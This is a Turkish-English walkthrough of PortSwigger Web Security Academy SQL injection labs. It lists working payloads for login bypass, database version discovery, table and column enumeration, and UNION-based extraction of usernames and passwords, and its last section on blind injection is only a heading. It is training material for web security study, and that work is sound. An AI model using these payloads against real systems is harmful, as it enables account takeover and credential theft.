                        SQL injection
                        SQL enjeksiyonu
######################################################################################################
#      SQL injection vulnerability in WHERE clause allowing retrieval of hidden data                 #
#      WHERE yan tümcesinde gizli verilerin alınmasına izin veren SQL enjeksiyon güvenlik açığı      #
######################################################################################################

1--> sql injection payload'ı category parametresi'nde çalıştırabiliyoruz.
payload => '+OR+1=1--
GET /filter?category='+OR+1=1-- HTTP/2 şeklinde burpsuite üzerinden görüntüleyebiliyoruz.
Kullanıcı bir kategori seçtiğinde arka planda çalışan sql kodları => SELECT * FROM products WHERE category = 'Gifts' AND released = 1

################################################################################
#      SQL injection vulnerability allowing login bypass                       #
#      Oturum açmanın atlanmasına izin veren SQL enjeksiyon güvenlik açığı     #
################################################################################

2--> csrf=$CSRFCOOKIES&username=administrator%27--&password=qwe şeklinde isteği tekrar değiştirip yolluyoruz.
login kısmına administrator'--
password qwe gibi random bir değer atayabiliriz.

##############################################################################################
#      SQL injection attack, querying the database type and version on Oracle                #
#      SQL enjeksiyon saldırısı, Oracle'da veritabanı tipini ve versiyonunu sorgulama        #
##############################################################################################

3--> category parametresi üzerinden oracle database verilerini çekiyoruz.
https://$yourlabsid.web-security-academy.net/filter?category=Gifts%27+UNION+SELECT+%27abc%27,%27def%27+FROM+dual--
https://$yourlabsid.web-security-academy.net/filter?category=Gifts%27+UNION+SELECT+BANNER,+NULL+FROM+v$version--
tabloları getir => '+UNION+SELECT+'asd','qwe'+FROM+dual--
versiyon numarası göster => '+UNION+SELECT+BANNER,+NULL+FROM+v$version--

########################################################################################################
#      SQL injection attack, querying the database type and version on MySQL and Microsoft             #
#      SQL enjeksiyon saldırısı, MySQL ve Microsoft'ta veritabanı türünü ve sürümünü sorgulama         #
########################################################################################################

4--> Burpsuite --> Gifts bölümünde sql injection açığı saldırısı yaparak bilgilere erişilebilir.
sütun sayıları ve hangi verileri içeriyor => GET /filter?category=Gifts'+UNION+SELECT+'abc','def'#
versiyon => GET /filter?category=Gifts'+UNION+SELECT+@@version,+NULL#

########################################################################################################
#      SQL injection attack, listing the database contents on non-Oracle databases                     #
#      Oracle dışı veritabanlarındaki veritabanı içeriklerini listeleyen SQL enjeksiyon saldırısı      #
########################################################################################################

5--> https://$YOURLABSID.web-security-academy.net/filter?category=Pets%27%20UNION%20SELECT%20username_nlemgu,%20password_mksmyq%20FROM%20users_unzwub--
Sütun sayısı ve metinleri bul => Pets' UNION SELECT 'abc','def'--
Tablo isimlerini ele geçir => Pets' UNION SELECT table_name, NULL FROM information_schema.tables--
Tablodaki sütünların ayrıntılarını bul => Pets' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='users_unzwub'--
tüm kullanıcıların şifrelerini bul => Pets' UNION SELECT username_nlemgu, password_mksmyq FROM users_unzwub--

###################################################################################
#      SQL injection attack, listing the database contents on Oracle              #
#      Oracle'da veritabanı içeriklerini listeleyen SQL enjeksiyon saldırısı      #
###################################################################################

6--> 
https://$YOURLABSID.web-security-academy.net/filter?category=Gifts
Sütun sayısı ve metinleri bul => https://$YOURLABSID.web-security-academy.net/filter?category=Gifts%27+UNION+SELECT+%27abc%27,%27def%27+FROM+dual--
Tablo isimlerini ele geçir => https://$YOURLABSID.web-security-academy.net/filter?category=Gifts%27+UNION+SELECT+table_name,NULL+FROM+all_tables--
Tablodaki sütünların ayrıntılarını bul => https://$YOURLABSID.web-security-academy.net/filter?category=Gifts%27+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name=%27USERS_RUALXQ%27--
tüm kullanıcıların şifrelerini bul => https://$YOURLABSID.web-security-academy.net/filter?category=Gifts%27+UNION+SELECT+USERNAME_JRIBRV,+PASSWORD_AHLCIP+FROM+USERS_RUALXQ--

#################################################################################################
#      SQL injection UNION attack, determining the number of columns returned by the query      #
#      Sorgunun döndürdüğü sütun sayısını belirleyen SQL enjeksiyon UNION saldırısı             #
#################################################################################################

7--> sütun sayısını bulmamızı istiyor
https://$YOURLABSID.web-security-academy.net/filter?category=Lifestyle'+UNION+SELECT+NULL--
https://$YOURLABSID.web-security-academy.net/filter?category=Lifestyle%27+UNION+SELECT+NULL,NULL,NULL--

##########################################################################
#      SQL injection UNION attack, finding a column containing text      #
#      SQL enjeksiyon UNION saldırısı, metin içeren bir sütun bulma      #
##########################################################################

8--> Önce sütün sayısını bulup sonra hangi sütünda değer gösterdiğini kontrol ediyoruz.
https://$YOURLABSID.web-security-academy.net/filter?category=Gifts%27+UNION+SELECT+NULL,NULL,NULL--
https://$YOURLABSID.web-security-academy.net/filter?category=Gifts%27+UNION+SELECT+NULL,%27NUB9LR%27,NULL--

###########################################################################
#      SQL injection UNION attack, retrieving data from other tables      #
#      SQL enjeksiyon UNION saldırısı, diğer tablolardan veri alma        #
###########################################################################

9--> 
öncelikle sütun sayısını buluyoruz => https://$YOURLABSID.web-security-academy.net/filter?category=Lifestyle%27+UNION+SELECT+%27abc%27,%27def%27--
sonra username ve password bilgilerini users tablosundan çekiyoruz => https://$YOURLABSID.web-security-academy.net/filter?category=Lifestyle%27+UNION+SELECT+username,+password+FROM+users--

#######################################################################################
#      SQL injection UNION attack, retrieving multiple values in a single column      #
#      SQL enjeksiyon UNION saldırısı, tek bir sütunda birden fazla değer alma        #
#######################################################################################

10--> 
sütun sayısı ve hangi sütunun veri döndürdüğünü deniyoruz => https://$YOURLABSID.web-security-academy.net/filter?category=Gifts%27+UNION+SELECT+NULL,%27abc%27--
users adlı tablodan username ve password bilgilerini çekiyoruz => https://$YOURLABSID.web-security-academy.net/filter?category=Gifts%27+UNION+SELECT+NULL,username||%27~%27||password+FROM+users--

############################################################
#      Blind SQL injection with conditional responses      #
#      Koşullu yanıtlarla kör SQL enjeksiyonu              #
############################################################

11--> 
